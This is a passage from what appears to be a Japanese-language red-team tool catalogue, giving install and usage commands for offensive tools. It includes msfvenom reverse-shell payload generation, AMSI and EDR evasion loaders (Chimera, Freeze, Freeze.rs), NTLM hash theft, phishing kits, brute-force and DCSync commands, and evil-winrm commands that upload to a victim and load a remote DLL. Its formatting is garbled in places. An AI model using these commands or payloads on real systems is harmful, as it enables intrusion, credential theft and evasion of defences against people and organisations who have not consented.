./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

画像の出典: https://github.com/zhzyker/dismap

🔙enum4linux

WindowsおよびSambaシステムから情報を列挙するためのツールです。

これを使用して、以下のような幅広い情報を収集できます。

  • ドメインおよびドメインコントローラーの情報
  • ローカルユーザーおよびグループの情報
  • 共有と共有アクセス許可
  • セキュリティポリシー
  • Active Directoryの情報

インストール: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**インストール: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

使用方法:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
完全な使用情報は、こちらの[ブログ](https://labs.portcullis.co.uk/tools/enum4linux/)で確認できます。

![image](https://assets.kitploit.com/production/public/readmes/495/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

_画像は https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/ より引用_

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

[Esc4iCEscEsc](https://github.com/Esc4iCEscEsc) 作成、Rust で書かれた、危険なほど高速な DNS/ネットワーク/ポートスキャナです。

サブドメインファイルが必要です。_例:[Sublist3r によるサブドメイン単語リスト](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_。

**インストール:**

最新のリリースを[こちら](https://github.com/Esc4iCEscEsc/skanuvaty/releases)からダウンロードしてください。```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

使用方法:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

_画像提供元: https://github.com/Esc4iCEscEsc/skanuvaty_

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigorはインテリジェンスツールであり、その目的はOSINTタスクなどをAPIキーなしで実行することです。

**主な機能:**

- IPアドレス、ASN、組織に関する情報の検索。
- rustscan、masscan、nmapをIP/CIDR上でより効率的に実行するためのラッパー。
- さまざまな手法(証明書、whois、Google Analyticsなど)を適用して、ターゲットに関連するドメインをさらに見つける。
- IPアドレスの概要を取得(提供: [@thebl4ckturtle](https://github.com/theblackturtle))

**インストール:**```bash
go install github.com/j3ssie/metabigor@latest

使用方法:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

_画像の出典: https://github.com/j3ssie/metabigor_

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob は、Github 上の公開リポジトリにプッシュされた機密性の高いファイルを発見するためのツールです。

Gitrob は、ユーザーや組織に属するリポジトリを設定した深さまでクローンし、コミット履歴をスキャンして、機密性の高いファイルのシグネチャに一致するファイルをフラグ付けします。

検出結果は、Web インターフェースで簡単にブラウジング・分析できるように表示されます。

**注:** _Gitrob が Github API と連携するには、Github アクセストークンが必要です。[個人アクセストークンを作成](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/)し、.bashrc などのシェル設定ファイルに環境変数として保存してください:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

インストール: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**インストール:(バイナリ)**

各リリースには[プリコンパイル済みバージョン](https://github.com/michenriksen/gitrob/releases)が用意されています。

**使い方:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

画像出典: https://www.uedbox.com/post/58828/

🔙gowitness

Gowitnessは、Golangで書かれたウェブサイトのスクリーンショットユーティリティです。Chrome Headlessを使用して、コマンドラインからWebインターフェースのスクリーンショットを生成し、結果を処理するための便利なレポートビューアが付属しています。LinuxとmacOSの両方をサポートしており、Windowsもほとんど動作します。

インストール: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
完全なインストール情報は[こちら](https://github.com/sensepost/gowitness/wiki/Installation)を参照してください。

**使用方法:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

完全な使用方法についてはこちらを参照してください。

画像

画像提供元: https://github.com/sensepost/gowitness

リソース開発

🔙Chimera

Chimeraは、AMSIやアンチウイルスソリューションを回避するために設計されたPowerShell難読化スクリプトです。AVをトリガーすることが知られている悪意のあるPS1を処理し、文字列の置換と変数の連結を使用して一般的な検知シグネチャを回避します。

インストール:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**使い方:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

Msfvenomは、多種多様な形式で様々なオペレーティングシステム用のペイロードを作成できます。また、AV回避のためのペイロード難読化もサポートしています。

リスナーの設定```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### Msfvenom コマンド

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

Shellterは動的シェルコードインジェクションツールであり、史上初の真に動的なPE感染型ツールです。

ネイティブWindowsアプリケーション(現在は32ビットアプリケーションのみ)にシェルコードを注入するために使用できます。

ShellterはPEファイルの元の構造を活用し、セクションのメモリアクセス権限の変更(ユーザーが希望しない限り)、RWEアクセスを持つ追加セクションの追加、AVスキャンで怪しく見えるような変更を一切適用しません。

完全なREADME情報はこちらにあります。

インストール: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**インストール: (Windows)**

[ダウンロードページ](https://www.shellterproject.com/download/)にアクセスしてインストールしてください。

**使用方法:**

正当なバイナリを選択してバックドアを仕込み、Shellterを実行するだけです。

便利なヒントは[こちら](https://www.shellterproject.com/tipstricks/)にあります。

コミュニティの使用デモは[こちら](https://www.shellterproject.com/shellter-community-demos/)に多数あります。

![image](https://assets.kitploit.com/production/public/readmes/495/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

_画像引用元: https://www.kali.org/tools/shellter/images/shellter.png_

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freezeは、EDRセキュリティコントロールを回避してシェルコードをステルスに実行するために使用されるペイロード作成ツールです。Freezeは、Userland EDRフックを除去するだけでなく、他のエンドポイント監視コントロールを回避する方法でシェルコードを実行するために、複数のテクニックを活用します。

**インストール:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

使用方法:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

_Image used from https://www.blackhatethicalhacking.com/tools/freeze/_

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

このスクリプトは、リモート画像を含むMicrosoft Word文書を作成し、リモートの被害者エンドポイントからNTMLハッシュをキャプチャできるようにします。

Microsoft Wordには、リモートの場所から画像を含める機能があります。攻撃者が制御するSMBサーバーにホストされたリモート画像も含まれます。これにより、認証された被害者がWord文書を開いて画像をレンダリングする際に送信されるNTLMハッシュを待ち受けてキャプチャする機会が得られます。

**インストール:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

使い方:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

_画像提供:https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/_

---

### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)

このフレームワークで使用されるテクニックについて詳しく知りたい場合は、SourceZero Blogおよび元のツールをご参照ください。

**説明:**

Freeze.rsは、EDRセキュリティ制御を回避し、シェルコードをステルスに実行するためのペイロード作成ツールです。Freeze.rsは複数の手法を利用して、ユーザーランドのEDRフックを除去するだけでなく、他のエンドポイント監視制御を回避する方法でシェルコードを実行します。

**中断状態のプロセスを作成する:**

プロセスが作成されると、最初に読み込まれるDLLはNtdll.dllです。これは、EDR DLLが読み込まれる前に発生します。つまり、EDRが読み込まれ、システムDLLのアセンブリにフックや変更を加え始めるまでに少し遅延があります。Ntdll.dll内のWindowsシステムコールを見ると、まだ何もフックされていないことがわかります。中断状態(時間的に凍結された状態)でプロセスを作成すると、Ntdll.dll以外のDLLは読み込まれていないことがわかります。また、EDR DLLが読み込まれていないため、Ntdll.dll内のシステムコールは変更されていないことがわかります。

![image](https://assets.kitploit.com/production/public/readmes/495/bd6869a0876e06b636a0ab2814e3a2353a4dd7954834e3d79c3b2b44a03c27a4.png)

**アドレス空間配置のランダム化(ASLR)**

このクリーンな中断プロセスを使用してFreeze.rsローダーからフックを除去するには、プログラム的にクリーンな中断プロセスのメモリを見つけ、読み取る方法が必要です。ここでアドレス空間配置のランダム化(ASLR)が役立ちます。ASLRはスタックメモリの破損に基づく脆弱性を防ぐためのセキュリティ機構です。ASLRはプロセス内のアドレス空間をランダム化し、すべてのメモリマップドオブジェクト、スタック、ヒープ、実行可能プログラム自体が一意になるようにします。ここで興味深いのは、ASLRが機能する一方で、DLLのような位置独立コードには機能しないことです。DLL(特に既知のシステムDLL)では、アドレス空間はブート時に一度だけランダム化されます。つまり、制御下にあるプロセスを含むすべてのプロセスで、ntdll.dllのベースアドレスは同じであるため、リモートプロセスの情報を列挙してntdll.dllのベースアドレスを見つける必要はありません。すべてのDLLのアドレスはブートごとに同じ場所にあるため、この情報を自分自身のプロセスから取得でき、中断プロセスを列挙してアドレスを見つける必要はありません。

![image](https://assets.kitploit.com/production/public/readmes/495/2e982f594ca0dc518cb32bf3ff1e2803416c699a0fe3f067b1d521276352f53d.png)

この情報を使用して、API ReadProcessMemoryを利用してプロセスのメモリを読み取ることができます。このAPI呼び出しは、資格情報ベースの攻撃の一環としてLSASSを読み取ることとよく関連付けられますが、それ自体は本質的に悪意のあるものではありません。特に、メモリの任意のセクションを読み取るだけならなおさらです。ReadProcessMemoryが怪しいものとしてフラグされるのは、読み取るべきではないもの(LSASSの内容など)を読み取る場合のみです。EDR製品は、ReadProcessMemoryが呼び出されたこと自体をフラグにしてはなりません。この関数には正当な運用上の用途があり、多くの誤検出を引き起こすからです。

さらに一歩進めて、DLL全体を読み取るのではなく、すべてのシステムコールが格納されているNtdll.dllの.textセクションのみを読み取ることもできます。

これらの要素を組み合わせることで、シェルコードを実行する前に、既存のフックされた.textセクションを上書きするために、Ntdll.dllの.textセクションのコピーをプログラム的に取得できます。

**ETWパッチ**

ETWは組み込みのシステムコールを利用してこのテレメトリを生成します。ETWもWindowsに組み込まれたネイティブ機能であるため、セキュリティ製品は情報にアクセスするためにETWシステムコールを「フック」する必要はありません。その結果、ETWを防ぐために、Freeze.rsは多数のETWシステムコールにパッチを適用し、レジスタをフラッシュして実行フローを次の命令に戻します。ETWへのパッチ適用は現在、すべてのローダーでデフォルトとなっています。

**シェルコード**

![image](https://assets.kitploit.com/production/public/readmes/495/896ef4933a6d5762f9b019a2b557d49af151890f979736ca6c710c856b3d8b94.png)

RustのNTAPIクレートを使用すると、これらの呼び出しがntdll.dllに表示されないことがわかりますが、プロセス内には依然として存在しています。

![image](https://assets.kitploit.com/production/public/readmes/495/8fb4ee66b377c99c51144b36ef80b7f8e795c0197296959ed89161f57838a4c0.png)

その結果:

![image](https://assets.kitploit.com/production/public/readmes/495/a8a1bbb194d7e417c9961540376fcb92dc4092b4cbe524cc5c58ce820cb24568.png)

![image](https://assets.kitploit.com/production/public/readmes/495/8a5ddf3aebb2e87f5226d6cde7414adde2d0f4485ddee6aa82170484d8967bd4.png)

**なぜRustなのか?**

これはRustを学ぶための楽しいプロジェクトとして始まり、独自のフレームワークに成長しました。

**貢献**

Freeze.rsはRustで開発されました。

**インストール**

RustとRustupがインストールされていない場合は、インストールしてください。OSXまたはLinuxからコンパイルする場合は、ターゲット「x86_64-pc-windows-gnu」が追加されていることを確認してください。そのためには、次のコマンドを実行します:

完了したら、Freeze.rsをコンパイルできます。次のコマンドを実行するか、コンパイル済みのバイナリを使用してください:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release

そこから、コンパイルされたバージョンは target/release にあります (注意: --release を付けない場合、ファイルは target/debug/ )```bash ___________ _ /_ ____ ____ ________ ____ _______ ______ | ) _ __ _/ __ _/ __ \_ // __ \ _ __ / / | \ | | /\ /\ / / /\ / | | /_
_
/ |
| _
>_
>
___ \___ > /\ |__| /____ > / / / / / / / (@Tyl0us) Soon they will learn that revenge is a dish... best served COLD & Rusty...

USAGE: Freeze-rs [FLAGS] [OPTIONS]

FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information

OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.

root@kitploit:~
**バイナリとDLL**
Freeze.rsは.exeファイルまたは.dllファイルのいずれかを生成できます。これを指定するには、-Oコマンドラインオプションの末尾がバイナリの場合は.exe、DLLの場合は.dllとなるようにしてください。現在、他のファイルタイプはサポートされていません。DLLファイルの場合、Freeze.rsは追加のエクスポート機能を追加することもできます。これを行うには、-exportを使用して特定のエクスポート関数名を指定します。

**暗号化**
シェルコードを暗号化することは、EDRやその他のセキュリティ製品による検出や分析から保護するための重要な技術です。Freeze.rsにはシェルコードを暗号化するための複数の方法が用意されており、AES、ELZMA、RC4などがあります。

**AES**
AES(Advanced Encryption Standard)は、データを暗号化するために広く使用されている対称暗号化アルゴリズムです。Freeze.rsはAES-256ビットサイズを使用してシェルコードを暗号化します。AESを使用してシェルコードを暗号化する利点は、強力な暗号化を提供し、暗号化ライブラリで広くサポートされていることです。ただし、固定ブロックサイズを使用すると、パディングオラクル攻撃などの特定の攻撃に対して脆弱になる可能性があります。

**ELZMA**
ELZMAは、コードを難読化するためにマルウェアでよく使用される圧縮および暗号化アルゴリズムです。ELZMAを使用してシェルコードを暗号化するには、まずシェルコードをELZMAアルゴリズムで圧縮します。次に、圧縮されたデータをランダムなキーで暗号化します。暗号化されたデータとキーは、エクスプロイトコードに埋め込まれます。ELZMAを使用してシェルコードを暗号化する利点は、単一のアルゴリズムで圧縮と暗号化の両方を提供することです。これにより、エクスプロイトコードのサイズを削減し、検出を困難にすることができます。

**RC4**
RC4は、マルウェアでシェルコードを暗号化するためによく使用される対称暗号化アルゴリズムです。可変長のキーを使用できるストリーム暗号であり、そのシンプルさと速度で知られています。

**コンソール**
Freeze.rsは、最初にプロセスを作成し、その後バックグラウンドに移行する手法を利用します。これにより、2つのことが行われます。1つはプロセスを隠蔽しやすくすること、もう1つはEDR製品による検出を回避することです。すぐにバックグラウンドでプロセスを起動することは非常に疑わしく、悪意のある兆候となる可能性があります。Freeze.rsは、プロセスが作成されEDRのフックがロードされた後に、Windows関数の‘GetConsoleWindow’と‘ShowWindow’を呼び出し、ウィンドウ属性を非表示に変更することでこれを実現します。

-consoleコマンドラインオプションが選択された場合、Freeze.rsはプロセスをバックグラウンドに隠蔽しません。代わりに、Freeze.rsはローダーが何を行っているかを示すいくつかのデバッグメッセージを追加します。

### [🔙](#tool-list)WSH

**ペイロードの作成:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

実行:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**ペイロードの作成:**```html
<html>
  <body>
    <script>
      var c = "cmd.exe";
      new ActiveXObject("WScript.Shell").Run(c);
    </script>
  </body>
</html>

Execute: ファイルを実行

🔙VBA

Creating payload: ペイロードの作成:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**実行:** マクロ有効ドキュメントでAuto_Open()関数を設定する

# 初期アクセス

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Bash Bunnyは物理的なUSB攻撃ツールであり、多機能ペイロード配信システムです。コンピュータのUSBポートに差し込むように設計されており、データの操作や抽出、マルウェアのインストール、セキュリティ対策の回避など、さまざまな機能を実行するようにプログラムできます。

[hackinglab: Bash Bunny – ガイド](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Hak5 ドキュメント](https://docs.hak5.org/bash-bunny/)

[優れたペイロードリポジトリ](https://github.com/hak5/bashbunny-payloads)

[製品ページ](https://hak5.org/products/bash-bunny)

![image](https://assets.kitploit.com/production/public/readmes/495/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish。(GoPhish) Gophishは強力なオープンソースのフィッシングフレームワークで、組織のフィッシングに対する露出を簡単にテストできます。(evilginx2) スタンドアロンのman-in-the-middle攻撃フレームワークで、フィッシングログイン認証情報とセッションクッキーを取得し、2要素認証をバイパスするために使用されます。

**インストール:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

使用方法:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

このフレームワークは初期アクセスのキャンペーン作成に優れており、「SETは、信頼性の高い攻撃を迅速に構築できるカスタムアタックベクターを多数備えています」。

**インストール:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

使用方法:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

ログオンに対するブルートフォース攻撃に便利なツールです。SSH、FTP、TELNET、HTTPなどの多くのサービスに対してbf攻撃が可能です。

**インストール:**```bash
sudo apt install hydra

使用方法:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish は、OAuth デバイスコード認証フローと QR コードを組み合わせた手法を使用する高度なフィッシングツールです (フィッシング攻撃における OAuth デバイスコードフローの詳細については、[PhishInSuits](https://github.com/secureworks/PhishInSuits) を参照してください)。

攻撃手順:

- 被害者に悪意のあるQRコードを送信する
- 被害者がモバイル端末でQRコードをスキャンする
- 被害者が攻撃者制御のサーバーに誘導される (OAuth デバイスコード認証フロープロセスをトリガー)
- 被害者にMFAコードがメールで送信される (OAuth デバイスコードフローの15分タイマーをトリガー)
- 攻撃者が認証をポーリングする
- 被害者が正規のMicrosoftウェブサイトにコードを入力する
- 攻撃者が認証トークンを保存する

**インストール:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

注意: どちらのモジュールを使用する前に、settings.config ファイル内の Required と記された必要な情報を更新してください。

使用法(メールモジュール):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**使用方法 (サーバーモジュール):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisherは、攻撃者が被害者にフィッシングメールを作成・送信し、機密情報を取得するためのツールです。

カスタマイズ可能なテンプレート、キャンペーン管理、メール送信機能などの機能を備えており、フィッシング攻撃を実行するための強力で使いやすいツールです。King Phisherを使用することで、攻撃者は個人や組織を対象に、的を絞った説得力のあるフィッシングメールを送信でき、攻撃の成功率を高めることができます。

インストール(Linux - クライアント&サーバー):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**使い方:**

King Phisherがインストールされたら、[Wikiページ](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started)に従ってSSH、Database config、SMTPサーバなどの設定を行ってください。

![image](https://assets.kitploit.com/production/public/readmes/495/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

# 実行

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responderは、ネットワーク上でLLMNRおよびNBT-NSプロトコルをポイズニングし、認証情報の取得と任意のコード実行を可能にするツールです。

LLMNR(Link-Local Multicast Name Resolution)およびNBT-NS(NetBIOS Name Service)プロトコルは、Windowsシステムがローカルネットワーク上でホスト名をIPアドレスに解決するために使用されます。これらのプロトコルを使用してホスト名を解決できない場合、システムはローカルネットワークにホスト名の要求をブロードキャストします。

Responderはこれらのブロードキャストを待ち受け、偽のIPアドレスで応答することで、要求元システムを騙して認証情報を攻撃者に送信させます。

**インストール:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

使用方法:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/495/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

_画像は https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ より引用_

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Impacket ライブラリの一部であるユーティリティで、Windows システムからパスワードハッシュやその他のシークレットを抽出するために使用されます。

これは、システム上の Security Account Manager (SAM) データベースと対話し、ハッシュ化されたパスワードや以下のような情報を抽出することで実現します。

- ローカルアカウントのパスワードハッシュ
- Kerberos チケットとキー
- LSA シークレット

**インストール:**```bash
python3 -m pip install impacket

使い方:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

_画像提供元: https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM は、Windows Remote Management (WinRM: _管理者がWindowsマシン上でリモートからコマンドを実行できるようにするサービス_) のためのコマンドラインインターフェースを提供するツールです。

Evil-WinRM は攻撃者が WinRM を使用して Windows マシンにリモート接続し、任意のコマンドを実行することを可能にします。

主な機能は以下の通りです:

- Powershell スクリプトのメモリへのロード
- 一部の AV を回避する dll ファイルのメモリへのロード
- x64 ペイロードのロード
- Pass-the-hash のサポート
- ローカルおよびリモートファイルのアップロード・ダウンロード

**インストール: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

インストール: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
別のインストール手順は[こちら](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods)で確認できます。

**使用方法:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

完全な使用ドキュメントはこちらにあります。

image

画像は https://korbinian-spielvogel.de/posts/heist-writeup/ から使用

🔙Donut

VBScript、JScript、EXE、DLLファイル、およびdotNETアセンブリをメモリ内で実行するためのツールです。ファイルをディスクに書き込むことなく、カスタムペイロードをターゲットシステムに読み込んで実行できます。

インストール:(Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
ローダーテンプレート、動的ライブラリ donut.dll、静的ライブラリ donut.lib、およびジェネレータ donut.exe を生成するには、x64 Microsoft Visual Studio Developer コマンドプロンプトを起動し、Donut リポジトリをクローンしたディレクトリに移動して、次のように入力します。```bash
nmake -f Makefile.msvc

同じことを MinGW-64 を Windows または Linux で使用して行うには、Donut リポジトリをクローンしたディレクトリに移動し、次のように入力します。```bash make -f Makefile.mingw

root@kitploit:~
**インストール: (Linux)**```bash
pip3 install donut-shellcode

使用方法:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
全体的な使い方については、donutの[GitHubページ](https://github.com/TheWover/donut/#4-usage)を参照してください。

詳しくは、The Woverによる[最近のブログ記事](https://thewover.github.io/Bear-Claw/)をご覧ください。

![image](https://assets.kitploit.com/production/public/readmes/495/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

レッドチーム向けに、Office文書、VBスクリプト、ショートカット、その他の形式の難読化と生成を自動化するためのツールです。

**インストール: (バイナリ)**

